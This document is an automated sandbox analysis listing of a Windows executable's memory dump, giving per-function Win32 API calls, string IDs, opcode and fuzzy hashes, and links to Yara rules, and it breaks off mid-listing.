                                                                                                                                                                      • Opcode Fuzzy Hash: 1e0feee79519e5aae918a742b8a193951f5bbbb9ecf7fb155cf69e7055733cda
                                                                                                                                                                      • Instruction Fuzzy Hash: 3161B171A083619FD712DF26C844F6ABBE8AF44714F104A1EF9899B2D1CB74ED44CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E5A45, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 003E5AA6
                                                                                                                                                                      • inet_addr.WSOCK32(?,?,?), ref: 003E5AEB
                                                                                                                                                                      • gethostbyname.WSOCK32(?), ref: 003E5AF7
                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 003E5B05
                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003E5B75
                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003E5B8B
                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003E5C00
                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 003E5C06
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                      • Opcode ID: e8effbfcae5b4511e5400af8c943beccfc2e053ab8f5493351538865699fa650
                                                                                                                                                                      • Instruction ID: 0bb71f5daf9e53da07957c3608d24c93ba73688f50a4e7293e4032e52f5ee536
                                                                                                                                                                      • Opcode Fuzzy Hash: e8effbfcae5b4511e5400af8c943beccfc2e053ab8f5493351538865699fa650
                                                                                                                                                                      • Instruction Fuzzy Hash: 2551B0316047519FDB22AF25CC85B2AB7E4EF44314F148A2AF95ADB2E1DB74EC00CB55
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DB72E, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003DB73B
                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003DB7B1
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 003DB7BB
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 003DB828
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                                                                      • Opcode ID: d71c8388d17b93aebe60b27d42355a9f9f67623f4643ecc288c2b0faf0010756
                                                                                                                                                                      • Instruction ID: e53596297755ca829f102d018c0f52cd2cc33ff0c3de7bec3368279caa25ba38
                                                                                                                                                                      • Opcode Fuzzy Hash: d71c8388d17b93aebe60b27d42355a9f9f67623f4643ecc288c2b0faf0010756
                                                                                                                                                                      • Instruction Fuzzy Hash: 34318236A00205DFDB12EF64E885ABEB7B8EF44700F12812BF905DB391DB759942C751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C9471, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                        • Part of subcall function 003CB0C4: GetClassNameW.USER32 ref: 003CB0E7
                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003C94F6
                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 003C9501
                                                                                                                                                                      • GetParent.USER32 ref: 003C951D
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 003C9520
                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 003C9529
                                                                                                                                                                      • GetParent.USER32(?), ref: 003C9545
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 003C9548
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                                                                      • Opcode ID: ea0c388f1caadad777a5ded9750926110f871157ba39d0286dc08ab29429732d
                                                                                                                                                                      • Instruction ID: 57c9b3ab1feecf60b3099c13e4d5c59154d7a6133f821aecb51a280acd5b834f
                                                                                                                                                                      • Opcode Fuzzy Hash: ea0c388f1caadad777a5ded9750926110f871157ba39d0286dc08ab29429732d
                                                                                                                                                                      • Instruction Fuzzy Hash: 4121B270A00104BFCF06AB64CC85FFEBB68EF45300F11416AB961972A1DB795919DB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C955C, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                        • Part of subcall function 003CB0C4: GetClassNameW.USER32 ref: 003CB0E7
                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003C95DF
                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 003C95EA
                                                                                                                                                                      • GetParent.USER32 ref: 003C9606
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 003C9609
                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 003C9612
                                                                                                                                                                      • GetParent.USER32(?), ref: 003C962E
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 003C9631
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                                                                      • Opcode ID: 6068e6e76ecb4733ddd93628df9feb4e90220856b5f33205c94de24f03b134a7
                                                                                                                                                                      • Instruction ID: 260c68ce2975a3528b0a25c3b1b9a593d2a23d9936b0ca9f8d7457fb248df3fb
                                                                                                                                                                      • Opcode Fuzzy Hash: 6068e6e76ecb4733ddd93628df9feb4e90220856b5f33205c94de24f03b134a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 9621A175A00204BFDF06AB60CC85FFEBB68EF49300F11405AF911D72A1DB799919DB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C9645, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetParent.USER32 ref: 003C9651
                                                                                                                                                                      • GetClassNameW.USER32 ref: 003C9666
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003C9678
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003C96F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                                                                      • Opcode ID: 2c3cf04d7d8d3c2b113a250ec47fdb5f4a6cbdeed86d67cdbdce4519dd3b5c94
                                                                                                                                                                      • Instruction ID: 025abe14a584534723fc6490751b3b71ab76d0356486f13e27202cab3e850558
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c3cf04d7d8d3c2b113a250ec47fdb5f4a6cbdeed86d67cdbdce4519dd3b5c94
                                                                                                                                                                      • Instruction Fuzzy Hash: EB11A377348317BAEA033620EC0EFA6779C9F05770F22002BF900E54E1FEA56D619A59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D7C1A, Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003D7CF6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1725837607-0
                                                                                                                                                                      • Opcode ID: cd7a208002a43d23a9a98afec6a0e430b298bd58a64b6ecf24afea9613e394d4
                                                                                                                                                                      • Instruction ID: de7cdab7ecd1f01e4995843c51fe2f5abc22ece2b20be5baa71dff38acd53433
                                                                                                                                                                      • Opcode Fuzzy Hash: cd7a208002a43d23a9a98afec6a0e430b298bd58a64b6ecf24afea9613e394d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4AB1927290421A9FDB12DF94E885BBEB7B9FF08311F25406AE901EB351E734E941CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D4189, Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003D419D
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003D41AA
                                                                                                                                                                        • Part of subcall function 003938D8: __woutput_l.LIBCMT ref: 00393931
                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 003D41D4
                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 003D41E0
                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 003D41ED
                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 003D420D
                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 003D421F
                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 003D422E
                                                                                                                                                                      • LockResource.KERNEL32(?), ref: 003D423A
                                                                                                                                                                      • CreateIconFromResourceEx.USER32 ref: 003D429B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1433390588-0
                                                                                                                                                                      • Opcode ID: 58ff7c87a79901d758edee2ada38cebb7b26434d6615eb60caa469512fb5cf55
                                                                                                                                                                      • Instruction ID: b1e6feb66106c9fe8e5e010e34c38a3e704738c8ded801b86122c7101574de12
                                                                                                                                                                      • Opcode Fuzzy Hash: 58ff7c87a79901d758edee2ada38cebb7b26434d6615eb60caa469512fb5cf55
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B318EB660521ABFDB129F60EC85EBB7BACEF04301F004926FD15D6250D730DA61CBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D16DE, Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003D1700
                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003D0778,?,00000001), ref: 003D1714
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 003D171B
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003D0778,?,00000001), ref: 003D172A
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 003D173C
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003D0778,?,00000001), ref: 003D1755
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003D0778,?,00000001), ref: 003D1767
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003D0778,?,00000001), ref: 003D17AC
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003D0778,?,00000001), ref: 003D17C1
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003D0778,?,00000001), ref: 003D17CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                      • Opcode ID: 57c3948a91095f4baa4eaaf7d9bcc809ccca419333157670e4e6c13abee09efe
                                                                                                                                                                      • Instruction ID: 7243438f819346c9659d5a394ed1714137568f34fc23a3fe0d623694ec6e7c38
                                                                                                                                                                      • Opcode Fuzzy Hash: 57c3948a91095f4baa4eaaf7d9bcc809ccca419333157670e4e6c13abee09efe
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F315EB6604204BFEB239F14ED84B797BAEBB55711F114026F944DA3B0DB749D80CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E4458, Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                      • Opcode ID: 14ee8ea118b4cb28f2f558feca2211aaabf47964c17a91125c6f9e89e0dc8d43
                                                                                                                                                                      • Instruction ID: e15a4f7635d6d7797ba0bd58064d4af0c803270ea4eb97aa14ae2784f8877813
                                                                                                                                                                      • Opcode Fuzzy Hash: 14ee8ea118b4cb28f2f558feca2211aaabf47964c17a91125c6f9e89e0dc8d43
                                                                                                                                                                      • Instruction Fuzzy Hash: 31219F35301221AFDB12AF25EC49B7E77ACEF48725F11812AF906DB2A1DB34AD00CB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E9428, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                                                                      • String ID: ,,@$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                      • API String ID: 2862541840-25141876
                                                                                                                                                                      • Opcode ID: 4fa158b89691fb62213dfe1209bf50f6dc101253bdfa5bdbea1354e2da150fde
                                                                                                                                                                      • Instruction ID: ee7a0a5ccb46ff978053d59a4b22c2715877d0278365212868479ac8eb62684f
                                                                                                                                                                      • Opcode Fuzzy Hash: 4fa158b89691fb62213dfe1209bf50f6dc101253bdfa5bdbea1354e2da150fde
                                                                                                                                                                      • Instruction Fuzzy Hash: BC919171A00265ABDF26DFA6D844FAEB7B8EF45310F10825BF505AB2C0D7709945CFA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CA693, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                                                                      • Opcode ID: 02802d8996a3f810be68474746b4d88888f721e92a7bd025e5644a772b249d02
                                                                                                                                                                      • Instruction ID: 3b1a363d5eaf6f357250ce9d33ec0086ef46dfd2f5b3932e1fffc5c1dc440ff1
                                                                                                                                                                      • Opcode Fuzzy Hash: 02802d8996a3f810be68474746b4d88888f721e92a7bd025e5644a772b249d02
                                                                                                                                                                      • Instruction Fuzzy Hash: BC916371A00A0E9BDF1ADFA0C482FE9FB74BF04308F518119D99AEB551DB306D99CB91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00372E26, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowLongW.USER32 ref: 00372EAE
                                                                                                                                                                        • Part of subcall function 00371DB3: GetClientRect.USER32 ref: 00371DDC
                                                                                                                                                                        • Part of subcall function 00371DB3: GetWindowRect.USER32 ref: 00371E1D
                                                                                                                                                                        • Part of subcall function 00371DB3: ScreenToClient.USER32 ref: 00371E45
                                                                                                                                                                      • GetDC.USER32 ref: 003ACF82
                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003ACF95
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 003ACFA3
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 003ACFB8
                                                                                                                                                                      • ReleaseDC.USER32 ref: 003ACFC0
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003AD04B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                      • Opcode ID: 199e66c6bccf5bfc62b08dc123c3d962d74ce51867e3f920af48bc633b6b79aa
                                                                                                                                                                      • Instruction ID: 67d545ab941dd96b3dd7589441498420d9b7ac01c73110bfc373b136a66d4659
                                                                                                                                                                      • Opcode Fuzzy Hash: 199e66c6bccf5bfc62b08dc123c3d962d74ce51867e3f920af48bc633b6b79aa
                                                                                                                                                                      • Instruction Fuzzy Hash: FF71C331400205EFCF37DF64C884ABA7BBAFF4A350F15826AED569A665C7358C41DB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E8F5B, Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003FF910), ref: 003E903D
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003FF910), ref: 003E9071
                                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003E91EB
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 003E9215
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 560350794-0
                                                                                                                                                                      • Opcode ID: 84cd8e354402950d136ffd610c9d30ea98fd840ad21c15244af3d37297c03e2c
                                                                                                                                                                      • Instruction ID: 7413cd6eaf59c98d91f7ebff8d8bec52ae28c079ddc0c9c5f9df2810bb6ccd1d
                                                                                                                                                                      • Opcode Fuzzy Hash: 84cd8e354402950d136ffd610c9d30ea98fd840ad21c15244af3d37297c03e2c
                                                                                                                                                                      • Instruction Fuzzy Hash: 4EF15975A00219EFCF15DF95C888EAEB7B9FF49314F10815AF905AB290DB31AE46CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EF9A8, Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003EF9C9
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003EFB5C
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003EFB80
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003EFBC0
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003EFBE2
                                                                                                                                                                      • CreateProcessW.KERNEL32 ref: 003EFD5E
